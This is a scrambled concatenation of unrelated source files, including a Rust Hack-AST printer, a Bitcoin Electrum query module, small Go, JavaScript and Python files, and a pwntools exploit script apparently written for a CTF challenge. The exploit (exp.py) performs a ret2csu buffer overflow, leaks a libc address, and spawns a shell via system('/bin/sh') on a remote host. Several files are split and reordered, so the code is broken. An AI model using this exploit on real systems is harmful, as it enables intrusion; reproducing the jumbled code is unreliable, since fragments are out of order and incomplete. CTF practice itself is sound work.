Some(ast_defs::Id(_, call_id)) => { w.write_all(lstrip(adjust_id(env, call_id).as_ref(), "\\\\").as_bytes())? } None => { let buf = print_expr_to_string(ctx, env, e)?; w.write_all(lstrip_bslice(&buf, br"\\"))? } }; write::paren(w, |w| { write::concat_by(w, ", ", &es, |w, (pk, e)| match pk { ParamKind::Pnormal => print_expr(ctx, w, env, e), ParamKind::Pinout(_) => Err(Error::fail("illegal default value").into()), })?; match unpacked_element { None => Ok(()), Some(e) => { if !es.is_empty() { w.write_all(b", ")?; } // TODO: Should probably have ... also but we are not doing that in ocaml print_expr(ctx, w, env, e) } } }) } Expr_::New(x) => { let (cid, _, es, unpacked_element, _) = &**x; match cid.2.as_ciexpr() { Some(ci_expr) => { w.write_all(b"new ")?; match ci_expr.2.as_id() { Some(ast_defs::Id(_, cname)) => w.write_all( lstrip( &adjust_id( env, ClassName::from_ast_name_and_mangle( &bumpalo::Bump::new(), cname, ) .unsafe_as_str(), ), "\\\\", ) .as_bytes(), )?, None => { let buf = print_expr_to_string(ctx, env, ci_expr)?; w.write_all(lstrip_bslice(&buf, br"\\"))? } } write::paren(w, |w| { write::concat_by(w, ", ", es, |w, e| print_expr(ctx, w, env, e))?; match unpacked_element { None => Ok(()), Some(e) => { w.write_all(b", ")?; print_expr(ctx, w, env, e) } } }) } None => { match cid.2.as_ci() { Some(id) => { // Xml exprs rewritten as New exprs come // through here. print_xml(ctx, w, env, &id.1, es) } None => Err(Error::NotImpl(format!("{}:{}", file!(), line!())).into()), } } } } Expr_::ClassGet(cg) => { match &(cg.0).2 { ast::ClassId_::CIexpr(e) => match e.as_id() { Some(id) => w.write_all( get_class_name_from_id( ctx, env.codegen_env, true, /* should_format */ false, /* is_class_constant */ &id.1, ) .as_bytes(), )?, _ => print_expr(ctx, w, env, e)?, }, _ => return Err(Error::fail("TODO Unimplemented unexpected non-CIexpr").into()), } w.write_all(b"::")?; match &cg.1 { ast::ClassGetExpr::CGstring((_, litstr)) => { w.write_all(escaper::escape(litstr).as_bytes()) } ast::ClassGetExpr::CGexpr(e) => print_expr(ctx, w, env, e), } } Expr_::ClassConst(cc) => { if let Some(e1) = (cc.0).2.as_ciexpr() { handle_possible_colon_colon_class_expr(ctx, w, env, false, expr)?.map_or_else( || { let s2 = &(cc.1).1; match e1.2.as_id() { Some(ast_defs::Id(_, s1)) => { let s1 = get_class_name_from_id(ctx, env.codegen_env, true, true, s1); write::concat_str_by(w, "::", [&s1.into(), s2]) } _ => { print_expr(ctx, w, env, e1)?; w.write_all(b"::")?; w.write_all(s2.as_bytes()) } } }, Ok, ) } else { Err(Error::fail("TODO: Only expected CIexpr in class_const").into()) } } Expr_::Unop(u) => match u.0 { ast::Uop::Upincr => { print_expr(ctx, w, env, &u.1)?; w.write_all(b"++") } ast::Uop::Updecr => { print_expr(ctx, w, env, &u.1)?; w.write_all(b"--") } _ => { print_uop(w, u.0)?; print_expr(ctx, w, env, &u.1) } }, Expr_::ObjGet(og) => { print_expr(ctx, w, env, &og.0)?; w.write_all(match og.2 { ast::OgNullFlavor::OGNullthrows => b"->", ast::OgNullFlavor::OGNullsafe => b"?->", })?; print_expr(ctx, w, env, &og.1) } Expr_::Clone(e) => { w.write_all(b"clone ")?; print_expr(ctx, w, env, e) } Expr_::ArrayGet(ag) => { print_expr(ctx, w, env, &ag.0)?; write::square(w, |w| { write::option(w, &ag.1, |w, e: &ast::Expr| { handle_possible_colon_colon_class_expr(ctx, w, env, true, &e.2) .transpose() .unwrap_or_else(|| print_expr(ctx, w, env, e)) }) }) } Expr_::String2(ss) => write::concat_by(w, " . ", ss, |w, s| print_expr(ctx, w, env, s)), Expr_::PrefixedString(s) => { w.write_all(s.0.as_bytes())?; w.write_all(b" . ")?; print_expr(ctx, w, env, &s.1) } Expr_::Eif(eif) => { print_expr(ctx, w, env, &eif.0)?; w.write_all(b" ? ")?; write::option(w, &eif.1, |w, etrue| print_expr(ctx, w, env, etrue))?; w.write_all(b" : ")?; print_expr(ctx, w, env, &eif.2) } Expr_::Cast(c) => { write::paren(w, |w| print_hint(w, false, &c.0))?; print_expr(ctx, w, env, &c.1) } Expr_::Pipe(p) => { print_expr(ctx, w, env, &p.1)?; w.write_all(b" |> ")?; print_expr(ctx, w, env, &p.2) } Expr_::Is(i) => { print_expr(ctx, w, env, &i.0)?; w.write_all(b" is ")?; print_hint(w, true, &i.1) } Expr_::As(a) => { print_expr(ctx, w, env, &a.0)?; w.write_all(if a.2 { b" ?as " } else { b" as " })?; print_hint(w, true, &a.1) } Expr_::Varray(va) => print_expr_varray(ctx, w, env, &va.1), Expr_::Darray(da) => print_expr_darray(ctx, w, env, print_expr, &da.1), Expr_::Tuple(t) => write::wrap_by_(w, "varray[", "]", |w| { // A tuple is represented by a varray when using reflection. write::concat_by(w, ", ", t, |w, i| print_expr(ctx, w, env, i)) }), Expr_::List(l) => write::wrap_by_(w, "list(", ")", |w| { write::concat_by(w, ", ", l, |w, i| print_expr(ctx, w, env, i)) }), Expr_::Yield(y) => { w.write_all(b"yield ")?; print_afield(ctx, w, env, y) } Expr_::Await(e) => { w.write_all(b"await ")?; print_expr(ctx, w, env, e) } Expr_::Import(i) => { print_import_flavor(w, &i.0)?; w.write_all(b" ")?; print_expr(ctx, w, env, &i.1) } Expr_::Xml(_) => { Err(Error::fail("expected Xml to be converted to New during rewriting").into()) } Expr_::Efun(f) => print_efun(ctx, w, env, &f.0, &f.1), Expr_::FunctionPointer(fp) => { let (fp_id, targs) = &**fp; match fp_id { ast::FunctionPtrId::FPId(ast::Id(_, sid)) => { w.write_all(lstrip(adjust_id(env, sid).as_ref(), "\\\\").as_bytes())? } ast::FunctionPtrId::FPClassConst(ast::ClassId(_, _, class_id), (_, meth_name)) => { match class_id { ast::ClassId_::CIexpr(e) => match e.as_id() { Some(id) => w.write_all( get_class_name_from_id( ctx, env.codegen_env, true, /* should_format */ false, /* is_class_constant */ &id.1, ) .as_bytes(), )?, _ => print_expr(ctx, w, env, e)?, }, _ => { return Err(Error::fail( "TODO Unimplemented unexpected non-CIexpr in function pointer", ) .into()); } } w.write_all(b"::")?; w.write_all(meth_name.as_bytes())? } }; write::wrap_by_(w, "<", ">", |w| { write::concat_by(w, ", ", targs, |w, _targ| w.write_all(b"_")) }) } Expr_::Omitted => Ok(()), Expr_::Lfun(lfun) => { if ctx.dump_lambdas { let fun_ = &lfun.0; write::paren(w, |w| { write::paren(w, |w| { write::concat_by(w, ", ", &fun_.params, |w, param| { print_fparam(ctx, w, env, param) }) })?; w.write_all(b" ==> ")?; print_block_(ctx, w, env, &fun_.body.fb_ast) }) } else { Err(Error::fail( "expected Lfun to be converted to Efun during closure conversion print_expr", ) .into()) } } Expr_::ETSplice(splice) => { w.write_all(b"${")?; print_expr(ctx, w, env, splice)?; w.write_all(b"}") } Expr_::EnumClassLabel(ecl) => match &ecl.0 { Some(ast_defs::Id(_, s1)) => { let s1 = get_class_name_from_id(ctx, env.codegen_env, true, true, s1); write::concat_str_by(w, "#", [&s1.into(), &ecl.1]) } None => { w.write_all(b"#")?; w.write_all(ecl.1.as_bytes()) } }, Expr_::Dollardollar(_) | Expr_::ExpressionTree(_) | Expr_::FunId(_) | Expr_::Hole(_) | Expr_::KeyValCollection(_) | Expr_::Lplaceholder(_) | Expr_::MethodCaller(_) | Expr_::MethodId(_) | Expr_::Pair(_) | Expr_::ReadonlyExpr(_) | Expr_::SmethodId(_) | Expr_::This | Expr_::Upcast(_) | Expr_::ValCollection(_) => { todo!("T117477443: Unimplemented: Cannot print: {:?}", expr) } } } fn
( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, id: &str, es: &[ast::Expr], ) -> Result<()> { use ast::{Expr, Expr_}; fn syntax_error() -> Error { Error::NotImpl(String::from("print_xml: unexpected syntax")) } fn print_xhp_attr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, attr: &(ast_defs::ShapeFieldName, ast::Expr), ) -> Result<()> { match attr { (ast_defs::ShapeFieldName::SFlitStr(s), e) => print_key_value_( ctx, w, env, &s.1, |_, w, _, k| print_expr_string(w, k.as_slice()), e, ), _ => Err(syntax_error().into()), } } let (attrs, children) = if es.len() < 2 { return Err(syntax_error().into()); } else { match (&es[0], &es[1]) { (Expr(_, _, Expr_::Shape(attrs)), Expr(_, _, Expr_::Varray(children))) => { (attrs, &children.1) } _ => return Err(syntax_error().into()), } }; let env = ExprEnv { codegen_env: env.codegen_env, }; write!(w, "new {}", mangle(id.into()))?; write::paren(w, |w| { write::wrap_by_(w, "darray[", "]", |w| { write::concat_by(w, ", ", attrs, |w, attr| print_xhp_attr(ctx, w, &env, attr)) })?; w.write_all(b", ")?; print_expr_varray(ctx, w, &env, children)?; w.write_all(b", __FILE__, __LINE__") }) } fn print_efun( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, f: &ast::Fun_, use_list: &[ast::Lid], ) -> Result<()> { if f.fun_kind.is_fasync() || f.fun_kind.is_fasync_generator() { write!(w, "async ",)?; } w.write_all(b"function ")?; write::paren(w, |w| { write::concat_by(w, ", ", &f.params, |w, p| print_fparam(ctx, w, env, p)) })?; w.write_all(b" ")?; if !use_list.is_empty() { w.write_all(b"use ")?; write::paren(w, |w| { write::concat_by(w, ", ", use_list, |w: &mut dyn Write, ast::Lid(_, id)| { w.write_all(local_id::get_name(id).as_bytes()) }) })?; w.write_all(b" ")?; } print_block_(ctx, w, env, &f.body.fb_ast) } fn print_block( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, block: &[ast::Stmt], ) -> Result<()> { match block { [] | [ast::Stmt(_, ast::Stmt_::Noop)] => Ok(()), [ast::Stmt(_, ast::Stmt_::Block(b))] if b.len() == 1 => print_block_(ctx, w, env, b), [_, _, ..] => print_block_(ctx, w, env, block), [stmt] => print_statement(ctx, w, env, stmt), } } fn print_block_( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, block: &[ast::Stmt], ) -> Result<()> { write::wrap_by_(w, "{\\n", "}\\n", |w| { write::concat(w, block, |w, stmt| { if !matches!(stmt.1, ast::Stmt_::Noop) { w.write_all(b" ")?; print_statement(ctx, w, env, stmt)?; } Ok(()) }) }) } fn print_statement( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, stmt: &ast::Stmt, ) -> Result<()> { use ast::Stmt_ as S_; match &stmt.1 { S_::Return(expr) => write::wrap_by_(w, "return", ";\\n", |w| { write::option(w, &**expr, |w, e| { w.write_all(b" ")?; print_expr(ctx, w, env, e) }) }), S_::Expr(expr) => { print_expr(ctx, w, env, &**expr)?; w.write_all(b";\\n") } S_::Throw(expr) => { write::wrap_by_(w, "throw ", ";\\n", |w| print_expr(ctx, w, env, &**expr)) } S_::Break => w.write_all(b"break;\\n"), S_::Continue => w.write_all(b"continue;\\n"), S_::While(x) => { let (cond, block) = &**x; write::wrap_by_(w, "while (", ") ", |w| print_expr(ctx, w, env, cond))?; print_block(ctx, w, env, block.as_ref()) } S_::If(x) => { let (cond, if_block, else_block) = &**x; write::wrap_by_(w, "if (", ") ", |w| print_expr(ctx, w, env, cond))?; print_block(ctx, w, env, if_block)?; let mut buf = Vec::new(); print_block(ctx, &mut buf, env, else_block).map_err(|e| { match write::into_error(e) { e @ Error::NotImpl(_) => e, e => Error::Fail(format!("Failed: {}", e)), } })?; if !buf.is_empty() { write_bytes!(w, " else {}", BString::from(buf))?; }; Ok(()) } S_::Block(block) => print_block_(ctx, w, env, block), S_::Noop => Ok(()), /* TODO(T29869930) */ _ => w.write_all(b"TODO Unimplemented NYI: Default value printing"), } } fn print_fparam( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, param: &ast::FunParam, ) -> Result<()> { if param.callconv.is_pinout() { w.write_all(b"inout ")?; } if param.is_variadic { w.write_all(b"...")?; } write::option(w, &(param.type_hint).1, |w, h| { print_hint(w, true, h)?; w.write_all(b" ") })?; w.write_all(param.name.as_bytes())?; write::option(w, &param.expr, |w, e| { w.write_all(b" = ")?; print_expr(ctx, w, env, e) }) } fn print_bop(w: &mut dyn Write, bop: &ast_defs::Bop) -> Result<()> { use ast_defs::Bop; match bop { Bop::Plus => w.write_all(b"+"), Bop::Minus => w.write_all(b"-"), Bop::Star => w.write_all(b"*"), Bop::Slash => w.write_all(b"/"), Bop::Eqeq => w.write_all(b"=="), Bop::Eqeqeq => w.write_all(b"==="), Bop::Starstar => w.write_all(b"**"), Bop::Eq(None) => w.write_all(b"="), Bop::Eq(Some(bop)) => { w.write_all(b"=")?; print_bop(w, bop) } Bop::Ampamp => w.write_all(b"&&"), Bop::Barbar => w.write_all(b"||"), Bop::Lt => w.write_all(b"<"), Bop::Lte => w.write_all(b"<="), Bop::Cmp => w.write_all(b"<=>"), Bop::Gt => w.write_all(b">"), Bop::Gte => w.write_all(b">="), Bop::Dot => w.write_all(b"."), Bop::Amp => w.write_all(b"&"), Bop::Bar => w.write_all(b"|"), Bop::Ltlt => w.write_all(b"<<"), Bop::Gtgt => w.write_all(b">>"), Bop::Percent => w.write_all(b"%"), Bop::Xor => w.write_all(b"^"), Bop::Diff => w.write_all(b"!="), Bop::Diff2 => w.write_all(b"!=="), Bop::QuestionQuestion => w.write_all(b"??"), } } fn print_hint(w: &mut dyn Write, ns: bool, hint: &ast::Hint) -> Result<()> { let alloc = bumpalo::Bump::new(); let h = emit_type_hint::fmt_hint(&alloc, &[], false, hint).map_err(|e| match e.kind() { ErrorKind::Unrecoverable(s) => Error::fail(s), _ => Error::fail("Error printing hint"), })?; if ns { w.write_all(escaper::escape(h).as_bytes()) } else { w.write_all(escaper::escape(strip_ns(&h)).as_bytes()) } } fn print_import_flavor(w: &mut dyn Write, flavor: &ast::ImportFlavor) -> Result<()> { use ast::ImportFlavor as F; w.write_all(match flavor { F::Include => b"include", F::Require => b"require", F::IncludeOnce => b"include_once", F::RequireOnce => b"require_once", }) } /// Convert an `Expr` to a `String` of the equivalent source code. /// /// This is a debugging tool abusing a printer written for bytecode /// emission. It does not support all Hack expressions, and panics /// on unsupported syntax. /// /// If you have an `Expr` with positions, you are much better off /// getting the source code at those positions rather than using this. pub fn expr_to_string_lossy(mut ctx: Context<'_>, expr: &ast::Expr) -> String { ctx.dump_lambdas = true; let env = ExprEnv { codegen_env: None }; let mut escaped_src = Vec::new(); print_expr(&ctx, &mut escaped_src, &env, expr).expect("Printing failed"); let bs = escaper::unescape_double(unsafe { std::str::from_utf8_unchecked(&escaped_src) }) .expect("Unescaping failed"); let s = String::from_utf8_lossy(&bs); s.to_string() } pub fn external_print_expr( ctx: &Context<'_>, w: &mut dyn std::io::Write, env: &ExprEnv<'_, '_>, expr: &ast::Expr, ) -> std::result::Result<(), Error> { print_expr(ctx, w, env, expr).map_err(write::into_error)?; w.flush().map_err(write::into_error)?; Ok(()) }
print_xml
DiscardPower.js
const GameAction = require('./GameAction'); class DiscardPower extends GameAction { constructor() { super('discardPower'); } canChangeGameState({ card }) { return ['active plot', 'faction', 'play area'].includes(card.location) && card.power > 0; } createEvent({ card, amount = 1 }) { let finalAmount = Math.min(card.power, amount); return this.event('onCardPowerDiscarded', { card, power: finalAmount }, event => { event.card.power -= event.power; event.card.game.checkWinCondition(event.card.controller); }); }
} module.exports = new DiscardPower();
string.go
package scanner import "errors" func newStringScanner(ctx *buildingContext, position int) Scanner
{ ctx.fullRe = append(ctx.fullRe, "(.*)"...) return FuncScanner(func(input []byte, kv []interface{}) error { val, _ := kv[position].(*string) if val == nil { return errors.New("variable is not string pointer") } *val = string(input) return nil }) }
ep-vec.rs
// Copyright 2017 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![crate_type = "rlib"] pub fn new(arg1: f32, arg2: ())
{}
format_test.go
// // Copyright (c) 2018 Cavium // // SPDX-License-Identifier: Apache-2.0 // package distro import ( "encoding/json"
"github.com/edgexfoundry/edgex-go/core/domain/models" ) const ( devID1 = "id1" ) func TestJson(t *testing.T) { eventIn := models.Event{ Device: devID1, } jf := jsonFormater{} out := jf.Format(&eventIn) if out == nil { t.Fatal("out should not be nil") } var eventOut models.Event if err := json.Unmarshal(out, &eventOut); err != nil { t.Fatalf("Error unmarshalling event: %v", err) } if !reflect.DeepEqual(eventIn, eventOut) { t.Fatalf("Objects should be equals: %v %v", eventIn, eventOut) } } func TestXml(t *testing.T) { eventIn := models.Event{ Device: devID1, } xf := xmlFormater{} out := xf.Format(&eventIn) if out == nil { t.Fatal("out should not be nil") } var eventOut models.Event if err := xml.Unmarshal(out, &eventOut); err != nil { t.Fatalf("Error unmarshalling event: %v", err) } if !reflect.DeepEqual(eventIn, eventOut) { t.Fatalf("Objects should be equals: %v %v", eventIn, eventOut) } }
"encoding/xml" "reflect" "testing"
json.py
class
: craftplan = 'json/craftplan.json' category_to_icon_en = 'json/en/category_to_icon_en.json' words_en = 'json/en/words_en.json' items_en = 'json/en/items_en.json' material_to_icon_en = 'json/en/material_to_icon_en.json' plans_en = 'json/en/plans_en.json' materials_en = 'json/en/materials_en.json' items_fr = 'json/fr/items_fr.json' materials_fr = 'json/fr/materials_fr.json' words_fr = 'json/fr/words_fr.json' plans_fr = 'json/fr/plans_fr.json' category_to_icon_fr = 'json/fr/category_to_icon_fr.json' material_to_icon_fr = 'json/fr/material_to_icon_fr.json' @classmethod def get(cls, string): return cls.__getattribute__(cls, string)
JsonRes
exp.py
from pwn import * from LibcSearcher import LibcSearcher import sys io = -1 ############################ #********修改文件名********** ############################ file_name = 'level3_x64' port = 27974 ###########修改宏########### DEBUG = 1 LOG_PRINT = 1 TMUX = 0 def LOG_ADDR_SUCCESS(name:str, addr:int): ''' 打印地址
印信息 ''' if LOG_PRINT: log.success(info) def Get_Str_Addr(target_addr:str): """ 获取字符串的地址 """ global io return io.search(target_addr.encode()).__next__() if len(sys.argv) > 1 and sys.argv[1].isdigit(): io = remote('node3.buuoj.cn', int(sys.argv[1])) DEBUG = False def STOP(*args): pass elif DEBUG: # 本地打 io = process('./{}'.format(file_name)) def STOP(idx:str = 0): input('stop{} ===> {}'.format(idx, proc.pidof(io))) if TMUX: context.terminal = ['tmux', 'splitw', '-h'] gdb.attach(io, gdbscript='b *0x80485FC\nc\n') else: # 远程打 io = remote('node3.buuoj.cn', port) DEBUG = False def STOP(*args): pass io_elf = ELF('./{}'.format(file_name)) log.success("libc used ===> {}".format(io_elf.libc)) ##########################下面为攻击代码####################### ##########################下面为攻击代码####################### context.update(os='linux', arch='amd64', log_level='debug', endian='little') ''' ret2csu ''' csu_end = 0x4006AA csu_begin = 0x400690 io.recvuntil("Input:\n") payload = 0x88 * b'a' payload += p64(csu_end) + p64(0) + p64(1) + p64(io_elf.got['write']) payload += p64(0x10) + p64(io_elf.got['read']) + p64(1) payload += p64(csu_begin) payload += 0x38 * b'a' payload += p64(io_elf.sym['vulnerable_function']) io.send(payload) msg = io.recv() print(msg) read_addr = u64(msg[:6].ljust(8, b'\x00')) LOG_ADDR_SUCCESS('read_addr', read_addr) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') str_bin_sh = libc_base + libc.dump('str_bin_sh') LOG_ADDR_SUCCESS('libc_base', libc_base) LOG_ADDR_SUCCESS('system_addr', system_addr) LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh) payload = b'a' * 0x88 payload += p64(0x4006b3) + p64(str_bin_sh) payload += p64(system_addr) STOP() io.send(payload) io.interactive()
name: 变量名,str addr: 地址,int ''' global LOG_PRINT if LOG_PRINT: log.success('{} ===> {}'.format(name, hex(addr))) def LOG_SUCCESS(info): ''' 打
step09 buffer.py
class Buffer: def __init__(self):
def add(self, *a): for value in a: self.lst.append(value) while len(self.lst) >= 5: s = 0 for i in range(5): s += self.lst.pop(0) print(s) def get_current_part(self): return self.lst
self.lst = list()
query.rs
use bitcoin::blockdata::transaction::Transaction; use bitcoin::consensus::encode::deserialize; use bitcoin::hash_types::{BlockHash, TxMerkleNode, Txid}; use bitcoin::hashes::sha256d::Hash as Sha256dHash; use bitcoin_hashes::hex::ToHex; use bitcoin_hashes::Hash; use crypto::digest::Digest; use crypto::sha2::Sha256; use serde_json::Value; use std::collections::HashMap; use std::sync::{Arc, RwLock}; use crate::app::App; use crate::cache::TransactionCache; use crate::errors::*; use crate::index::{compute_script_hash, TxInRow, TxOutRow, TxRow}; use crate::mempool::Tracker; use crate::metrics::{HistogramOpts, HistogramVec, Metrics}; use crate::store::{ReadStore, Row}; use crate::util::{FullHash, HashPrefix, HeaderEntry}; pub struct FundingOutput { pub txn_id: Txid, pub height: u32, pub output_index: usize, pub value: u64, } type OutPoint = (Txid, usize); // (txid, output_index) struct SpendingInput { txn_id: Txid, height: u32, funding_output: OutPoint, value: u64, } pub struct Status { confirmed: (Vec<FundingOutput>, Vec<SpendingInput>), mempool: (Vec<FundingOutput>, Vec<SpendingInput>), txn_fees: HashMap<Txid, u64>, } fn calc_balance((funding, spending): &(Vec<FundingOutput>, Vec<SpendingInput>)) -> i64 { let funded: u64 = funding.iter().map(|output| output.value).sum(); let spent: u64 = spending.iter().map(|input| input.value).sum(); funded as i64 - spent as i64 } pub struct HistoryItem { height: i32, tx_hash: Txid, fee: Option<u64>, // need to be set only for unconfirmed transactions (i.e. height <= 0) } impl HistoryItem { pub fn to_json(&self) -> Value { let mut result = json!({ "height": self.height, "tx_hash": self.tx_hash.to_hex()}); self.fee.map(|f| { result .as_object_mut() .unwrap() .insert("fee".to_string(), json!(f)) }); result } } impl Status { fn funding(&self) -> impl Iterator<Item = &FundingOutput> { self.confirmed.0.iter().chain(self.mempool.0.iter()) } fn spending(&self) -> impl Iterator<Item = &SpendingInput> { self.confirmed.1.iter().chain(self.mempool.1.iter()) } pub fn confirmed_balance(&self) -> i64 { calc_balance(&self.confirmed) } pub fn mempool_balance(&self) -> i64 { calc_balance(&self.mempool) } pub fn history(&self) -> Vec<HistoryItem> { let mut txns_map = HashMap::<Txid, i32>::new(); for f in self.funding() { txns_map.insert(f.txn_id, f.height as i32); } for s in self.spending() { txns_map.insert(s.txn_id, s.height as i32); } let mut items: Vec<HistoryItem> = txns_map .into_iter() .map(|item| HistoryItem { height: item.1, tx_hash: item.0, fee: self.txn_fees.get(&item.0).cloned(), }) .collect(); items.sort_unstable_by_key(|item| item.height); items } pub fn unspent(&self) -> Vec<&FundingOutput> { let mut outputs_map = HashMap::<OutPoint, &FundingOutput>::new(); for f in self.funding() { outputs_map.insert((f.txn_id, f.output_index), f); } for s in self.spending() { if outputs_map.remove(&s.funding_output).is_none() { warn!("failed to remove {:?}", s.funding_output); } } let mut outputs = outputs_map .into_iter() .map(|item| item.1) // a reference to unspent output .collect::<Vec<&FundingOutput>>(); outputs.sort_unstable_by_key(|out| out.height); outputs } pub fn hash(&self) -> Option<FullHash> { let txns = self.history(); if txns.is_empty() { None } else { let mut hash = FullHash::default(); let mut sha2 = Sha256::new(); for item in txns { let part = format!("{}:{}:", item.tx_hash.to_hex(), item.height); sha2.input(part.as_bytes()); } sha2.result(&mut hash); Some(hash) } } } struct TxnHeight { txn: Transaction, height: u32, } fn merklize<T: Hash>(left: T, right: T) -> T { let data = [&left[..], &right[..]].concat(); <T as Hash>::hash(&data) } fn create_merkle_branch_and_root<T: Hash>(mut hashes: Vec<T>, mut index: usize) -> (Vec<T>, T) { let mut merkle = vec![]; while hashes.len() > 1 { if hashes.len() % 2 != 0 { let last = *hashes.last().unwrap(); hashes.push(last); } index = if index % 2 == 0 { index + 1 } else { index - 1 }; merkle.push(hashes[index]); index /= 2; hashes = hashes .chunks(2) .map(|pair| merklize(pair[0], pair[1])) .collect() } (merkle, hashes[0]) } // TODO: the functions below can be part of ReadStore. fn txrow_by_txid(store: &dyn ReadStore, txid: &Txid) -> Option<TxRow> { let key = TxRow::filter_full(&txid); let value = store.get(&key)?; Some(TxRow::from_row(&Row { key, value })) } fn txrows_by_prefix(store: &dyn ReadStore, txid_prefix: HashPrefix) -> Vec<TxRow> { store .scan(&TxRow::filter_prefix(txid_prefix)) .iter() .map(|row| TxRow::from_row(row)) .collect() } fn txids_by_script_hash(store: &dyn ReadStore, script_hash: &[u8]) -> Vec<HashPrefix> { store .scan(&TxOutRow::filter(script_hash)) .iter() .map(|row| TxOutRow::from_row(row).txid_prefix) .collect() } fn txids_by_funding_output( store: &dyn ReadStore, txn_id: &Txid, output_index: usize, ) -> Vec<HashPrefix> { store .scan(&TxInRow::filter(&txn_id, output_index)) .iter() .map(|row| TxInRow::from_row(row).txid_prefix) .collect() } pub struct Query { app: Arc<App>, tracker: RwLock<Tracker>, tx_cache: TransactionCache, txid_limit: usize, duration: HistogramVec, } impl Query { pub fn new( app: Arc<App>, metrics: &Metrics, tx_cache: TransactionCache, txid_limit: usize, ) -> Arc<Query> { Arc::new(Query { app, tracker: RwLock::new(Tracker::new(metrics)), tx_cache, txid_limit, duration: metrics.histogram_vec( HistogramOpts::new( "electrs_query_duration", "Time to update mempool (in seconds)", ), &["type"], ), }) } fn load_txns_by_prefix( &self, store: &dyn ReadStore, prefixes: Vec<HashPrefix>, ) -> Result<Vec<TxnHeight>> { let mut txns = vec![]; for txid_prefix in prefixes { for tx_row in txrows_by_prefix(store, txid_prefix) { let txid: Txid = deserialize(&tx_row.key.txid).unwrap(); let txn = self.load_txn(&txid, Some(tx_row.height))?; txns.push(TxnHeight { txn, height: tx_row.height, }) } } Ok(txns) } fn find_spending_input( &self, store: &dyn ReadStore, funding: &FundingOutput, ) -> Result<Option<SpendingInput>> { let spending_txns: Vec<TxnHeight> = self.load_txns_by_prefix( store, txids_by_funding_output(store, &funding.txn_id, funding.output_index), )?; let mut spending_inputs = vec![]; for t in &spending_txns { for input in t.txn.input.iter() { if input.previous_output.txid == funding.txn_id && input.previous_output.vout == funding.output_index as u32 { spending_inputs.push(SpendingInput { txn_id: t.txn.txid(), height: t.height, funding_output: (funding.txn_id, funding.output_index), value: funding.value, }) } } } assert!(spending_inputs.len() <= 1); Ok(if spending_inputs.len() == 1 { Some(spending_inputs.remove(0)) } else { None }) } fn find_funding_outputs(&self, t: &TxnHeight, script_hash: &[u8]) -> Vec<FundingOutput> { let mut result = vec![]; let txn_id = t.txn.txid(); for (index, output) in t.txn.output.iter().enumerate() { if compute_script_hash(&output.script_pubkey[..]) == script_hash { result.push(FundingOutput { txn_id, height: t.height, output_index: index, value: output.value, }) } } result } fn confirmed_status( &self, script_hash: &[u8], ) -> Result<(Vec<FundingOutput>, Vec<SpendingInput>)> { let mut funding = vec![]; let mut spending = vec![]; let read_store = self.app.read_store(); let txid_prefixes = txids_by_script_hash(read_store, script_hash); // if the limit is enabled if self.txid_limit > 0 && txid_prefixes.len() > self.txid_limit { bail!( "{}+ transactions found, query may take a long time", txid_prefixes.len() ); } for t in self.load_txns_by_prefix(read_store, txid_prefixes)? { funding.extend(self.find_funding_outputs(&t, script_hash)); } for funding_output in &funding { if let Some(spent) = self.find_spending_input(read_store, &funding_output)?
} Ok((funding, spending)) } fn mempool_status( &self, script_hash: &[u8], confirmed_funding: &[FundingOutput], tracker: &Tracker, ) -> Result<(Vec<FundingOutput>, Vec<SpendingInput>)> { let mut funding = vec![]; let mut spending = vec![]; let txid_prefixes = txids_by_script_hash(tracker.index(), script_hash); for t in self.load_txns_by_prefix(tracker.index(), txid_prefixes)? { funding.extend(self.find_funding_outputs(&t, script_hash)); } // // TODO: dedup outputs (somehow) both confirmed and in mempool (e.g. reorg?) for funding_output in funding.iter().chain(confirmed_funding.iter()) { if let Some(spent) = self.find_spending_input(tracker.index(), &funding_output)? { spending.push(spent); } } Ok((funding, spending)) } pub fn status(&self, script_hash: &[u8]) -> Result<Status> { let timer = self .duration .with_label_values(&["confirmed_status"]) .start_timer(); let confirmed = self .confirmed_status(script_hash) .chain_err(|| "failed to get confirmed status")?; timer.observe_duration(); let tracker = self.tracker.read().unwrap(); let timer = self .duration .with_label_values(&["mempool_status"]) .start_timer(); let mempool = self .mempool_status(script_hash, &confirmed.0, &tracker) .chain_err(|| "failed to get mempool status")?; timer.observe_duration(); let mut txn_fees = HashMap::new(); let funding_txn_ids = mempool.0.iter().map(|funding| funding.txn_id); let spending_txn_ids = mempool.1.iter().map(|spending| spending.txn_id); for mempool_txid in funding_txn_ids.chain(spending_txn_ids) { tracker .get_fee(&mempool_txid) .map(|fee| txn_fees.insert(mempool_txid, fee)); } Ok(Status { confirmed, mempool, txn_fees, }) } fn lookup_confirmed_blockhash( &self, tx_hash: &Txid, block_height: Option<u32>, ) -> Result<Option<BlockHash>> { let blockhash = if self.tracker.read().unwrap().has_txn(&tx_hash) { None // found in mempool (as unconfirmed transaction) } else { // Lookup in confirmed transactions' index let height = match block_height { Some(height) => height, None => { txrow_by_txid(self.app.read_store(), &tx_hash) .chain_err(|| format!("not indexed tx {}", tx_hash))? .height } }; let header = self .app .index() .get_header(height as usize) .chain_err(|| format!("missing header at height {}", height))?; Some(*header.hash()) }; Ok(blockhash) } // Internal API for transaction retrieval fn load_txn(&self, txid: &Txid, block_height: Option<u32>) -> Result<Transaction> { let _timer = self.duration.with_label_values(&["load_txn"]).start_timer(); self.tx_cache.get_or_else(&txid, || { let blockhash = self.lookup_confirmed_blockhash(txid, block_height)?; let value: Value = self .app .daemon() .gettransaction_raw(txid, blockhash, /*verbose*/ false)?; let value_hex: &str = value.as_str().chain_err(|| "non-string tx")?; 